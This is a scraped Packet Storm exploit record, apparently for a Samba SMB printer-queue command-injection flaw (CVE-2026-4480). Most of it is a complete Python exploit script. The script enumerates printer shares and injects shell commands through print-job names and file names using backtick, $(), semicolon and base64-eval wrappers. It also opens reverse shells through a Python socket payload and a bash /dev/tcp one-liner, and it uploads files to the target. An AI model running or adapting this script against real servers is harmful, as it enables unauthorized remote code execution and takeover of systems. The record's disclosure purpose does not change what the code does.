{“lastseen”:”2026-06-02T17:46:08″,”description”:”This Python script is a structured exploitation framework targeting Samba print services exposed over SMB port 445. It focuses on printer-share interaction, payload delivery testing, and command execution workflows through manipulated print job…”,”published”:”2026-06-02T00:00:00″,”modified”:”2026-06-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samba SMB Printer Queue Command Injection \/ Remote Task Delivery”,”source”:””,”references”:””,”id”:”PACKETSTORM:222477″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-4480″],”sourceData”:”==================================================================================================================================\\n | # Title : Samba 4.22.10, 4.23.8 and 4.24.3 \u2013 SMB Printer Queue Command Injection and Remote Task Delivery |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.samba.org\/samba\/security\/CVE-2026-4480.html |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python script is a structured exploitation framework targeting Samba print services exposed over SMB (port 445). \\n It focuses on printer-share interaction, payload delivery testing, and command execution workflows through manipulated print job submissions.\\n \\t\\t\\t\\t \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import socket\\n import sys\\n import argparse\\n import time\\n import re\\n import base64\\n import io\\n from threading import Thread\\n from smb.SMBConnection import SMBConnection\\n from smb.base import SharedDevice\\n \\n class SambaPrintExploit:\\n def __init__(self, target_host, target_port=445, share_name=\\”print$\\”, \\n username=\\”\\”, password=\\”\\”, domain=\\”\\”):\\n \\”\\”\\”\\n Initialize Samba Print Server Exploit Structure\\n \\”\\”\\”\\n self.target_host = target_host\\n self.target_port = target_port\\n self.share_name = share_name\\n self.username = username or \\”guest\\”\\n self.password = password or \\”\\”\\n self.domain = domain or \\”WORKGROUP\\”\\n self.connection = None\\n self.lhost = \\”127.0.0.1\\”\\n self.lport = 4444\\n \\n def connect(self):\\n \\”\\”\\”Establish SMB connection to target\\”\\”\\”\\n try:\\n print(f\\”[*] Connecting to {self.target_host}:{self.target_port}\\”)\\n self.connection = SMBConnection(\\n self.username,\\n self.password,\\n \\”exploit-client\\”,\\n self.target_host,\\n domain=self.domain,\\n use_ntlm_v2=True,\\n is_direct_tcp=True\\n )\\n \\n if self.connection.connect(self.target_host, self.target_port):\\n print(f\\”[+] Connected successfully as {self.username}\\”)\\n return True\\n return False\\n \\n except Exception as e:\\n print(f\\”[-] Connection failed: {e}\\”)\\n return False\\n \\n def list_printers(self):\\n \\”\\”\\”List available printers on the server\\”\\”\\”\\n try:\\n print(\\”[*] Enumerating printers…\\”)\\n shares = self.connection.listShares()\\n \\n printers = []\\n for share in shares:\\n if share.is_printer:\\n printers.append(share.name)\\n print(f\\”[+] Found printer: {share.name}\\”)\\n \\n if not printers:\\n print(\\”[-] No printers found\\”)\\n return None\\n \\n return printers\\n \\n except Exception as e:\\n print(f\\”[-] Failed to list printers: {e}\\”)\\n return None\\n \\n def check_vulnerability(self, printer_name):\\n \\”\\”\\”Check if the printer share responds properly to print requests\\”\\”\\”\\n print(f\\”[*] Checking printer queue communication on: {printer_name}\\”)\\n test_payload = \\”echo ‘Testing Connection’\\”\\n \\n try:\\n result = self.print_file(printer_name, test_payload, is_test=True)\\n if result:\\n print(\\”[+] Target printer share accepted the print job request.\\”)\\n return True\\n return False\\n except Exception as e:\\n print(f\\”[-] Check failed: {e}\\”)\\n return False\\n \\n def escape_payload(self, payload):\\n \\”\\”\\”Generate formatted syntax variations for injection wrappers\\”\\”\\”\\n injections = [\\n f\\”`{payload}`\\”,\\n f\\”$({payload})\\”,\\n f\\”; {payload} ;\\”,\\n f\\”|| {payload} ||\\”,\\n f\\”\\u0026\\u0026 {payload} \\u0026\\u0026\\”\\n ]\\n return injections \\n \\n def create_malicious_print_job(self, command):\\n \\”\\”\\”Create multi-stage script blocks using the validated command string\\”\\”\\”\\n b64_cmd = base64.b64encode(command.encode()).decode()\\n \\n payloads = [\\n f\\”‘; {command} ; ‘\\”,\\n f\\”`{command}`\\”,\\n f\\”$({command})\\”,\\n f\\”‘; eval $(echo ‘{b64_cmd}’ | base64 -d); ‘\\”,\\n f\\”‘; bash -c \\\\\\”{command}\\\\\\” ; ‘\\”,\\n f\\”‘; sh -c \\\\\\”{command}\\\\\\” ; ‘\\”\\n ]\\n reverse_payload = f\\”‘; python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\”{self.lhost}\\\\\\”,{self.lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\”\/bin\/sh\\\\\\”,\\\\\\”-i\\\\\\”]);’ ; ‘\\”\\n payloads.append(reverse_payload)\\n \\n return payloads\\n \\n def print_file(self, printer_name, command, is_test=False):\\n \\”\\”\\”Send print job data handling payload string structures properly\\”\\”\\”\\n try:\\n payloads = self.create_malicious_print_job(command)\\n \\n for payload in payloads:\\n print(f\\”[*] Dispatching job format: {payload[:50]}…\\”)\\n job_description = payload\\n try:\\n file_content = f\\”Job Name: {job_description}\\\\nUser: {self.username}\\\\n\\”\\n file_data = io.BytesIO(file_content.encode(‘utf-8’))\\n \\n self.connection.printFile(\\n printer_name,\\n f\\”job_{int(time.time())}.txt\\”,\\n file_data,\\n timeout=15\\n )\\n print(f\\”[+] Print job delivered to share: {printer_name}\\”)\\n if not is_test:\\n return True\\n except Exception as e:\\n print(f\\”[-] Primary delivery method failed: {e}\\”)\\n try:\\n empty_data = io.BytesIO(b\\”\\”)\\n self.connection.printFile(\\n printer_name,\\n f\\”‘;{command};’.txt\\”,\\n empty_data,\\n timeout=15\\n )\\n print(f\\”[+] Secondary empty-buffer delivery completed\\”)\\n return True\\n except:\\n pass\\n \\n return False\\n \\n except Exception as e:\\n print(f\\”[-] Job packaging failed: {e}\\”)\\n return False\\n \\n def execute_command(self, command, printer_name=None):\\n \\”\\”\\”Execute arbitrary command on target systems via queue tasks\\”\\”\\”\\n if not printer_name:\\n printers = self.list_printers()\\n if not printers:\\n return False\\n printer_name = printers[0]\\n \\n return self.print_file(printer_name, command)\\n \\n def get_reverse_shell(self, lhost, lport, printer_name=None):\\n \\”\\”\\”Configure parameters and trigger structural reverse connection string\\”\\”\\”\\n self.lhost = lhost\\n self.lport = lport\\n \\n shell_payload = f\\”bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261\\”\\n print(f\\”[*] Queueing handler delivery targeting {lhost}:{lport}\\”)\\n return self.execute_command(shell_payload, printer_name)\\n \\n def upload_file(self, local_file, remote_path, printer_name=None):\\n try:\\n with open(local_file, ‘rb’) as f:\\n content = f.read()\\n b64_content = base64.b64encode(content).decode()\\n command = f\\”echo ‘{b64_content}’ | base64 -d \\u003e {remote_path}\\”\\n return self.execute_command(command, printer_name)\\n except Exception as e:\\n print(f\\”[-] Pre-upload failure: {e}\\”)\\n return False\\n def main():\\n parser = argparse.ArgumentParser(description=’Samba Print Server Code Logic Verifier’)\\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target IP address’)\\n parser.add_argument(‘-p’, ‘–port’, type=int, default=445, help=’SMB port’)\\n parser.add_argument(‘-s’, ‘–share’, default=’print$’)\\n parser.add_argument(‘-u’, ‘–username’, default=’guest’)\\n parser.add_argument(‘-P’, ‘–password’, default=”)\\n parser.add_argument(‘-d’, ‘–domain’, default=’WORKGROUP’)\\n parser.add_argument(‘-c’, ‘–command’, help=’Command to run’)\\n parser.add_argument(‘–printer’)\\n parser.add_argument(‘–reverse-shell’, action=’store_true’)\\n parser.add_argument(‘–lhost’)\\n parser.add_argument(‘–lport’, type=int, default=4444)\\n parser.add_argument(‘–list-printers’, action=’store_true’)\\n parser.add_argument(‘–check’, action=’store_true’)\\n parser.add_argument(‘–upload’, nargs=2, metavar=(‘LOCAL’, ‘REMOTE’)) \\n args = parser.parse_args() \\n exploit = SambaPrintExploit(\\n target_host=args.target,\\n target_port=args.port,\\n share_name=args.share,\\n username=args.username,\\n password=args.password,\\n domain=args.domain\\n )\\n \\n if not exploit.connect():\\n sys.exit(1)\\n \\n if args.list_printers:\\n exploit.list_printers()\\n sys.exit(0)\\n \\n if args.check:\\n printers = exploit.list_printers()\\n if printers:\\n exploit.check_vulnerability(printers[0])\\n sys.exit(0)\\n \\n if args.upload:\\n local_file, remote_file = args.upload\\n exploit.upload_file(local_file, remote_file, args.printer)\\n sys.exit(0)\\n \\n if args.reverse_shell:\\n if not args.lhost:\\n print(\\”[-] –lhost configuration value is mandatory for this operation.\\”)\\n sys.exit(1)\\n exploit.get_reverse_shell(args.lhost, args.lport, args.printer)\\n sys.exit(0)\\n \\n if args.command:\\n exploit.execute_command(args.command, args.printer)\\n sys.exit(0)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222477″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222477\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-02T17:46:08″,”description”:”This Python script is a structured exploitation framework targeting Samba print services exposed over SMB port 445. It focuses on printer-share interaction, payload delivery testing,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-59351","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n